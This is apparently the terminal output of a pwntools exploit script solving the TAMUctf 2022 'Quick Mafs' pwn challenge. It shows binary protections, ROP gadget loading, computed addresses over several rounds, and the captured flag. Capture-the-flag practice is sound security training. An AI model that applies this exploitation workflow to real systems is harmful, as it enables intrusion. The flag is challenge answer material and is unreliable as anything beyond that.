mito@ubuntu:~/CTF/TAMUctf_2022/Pwn_Quick_Mafs$ python3 solve.py 
[+] Opening connection to tamuctf.com on port 443: Done
solve.py:8: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.recvuntil("rax = ")
ret_value = 0x89c2
[*] '/home/mito/CTF/TAMUctf_2022/Pwn_Quick_Mafs/elf'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
mp = 33 , mv =  0x83ee , ma = 0x4015b8 , diff = 0x5d4
solve.py:54: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.sendline(buf.hex())
solve.py:8: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.recvuntil("rax = ")
ret_value = 0xe9ea
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
mp = 0 , mv =  0xe695 , ma = 0x401030 , diff = 0x355
ret_value = 0x6e04
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
mp = 47 , mv =  0x65c4 , ma = 0x401600 , diff = 0x840
ret_value = 0x4a3c
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
mp = 48 , mv =  0x430d , ma = 0x401684 , diff = 0x72f
ret_value = 0x7fea
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
mp = 44 , mv =  0x7d6f , ma = 0x401588 , diff = 0x27b
[*] Switching to interactive mode
gigem{7w0_qu4dr1ll10n?_7h475_r34lly_qu1ck_m47h}
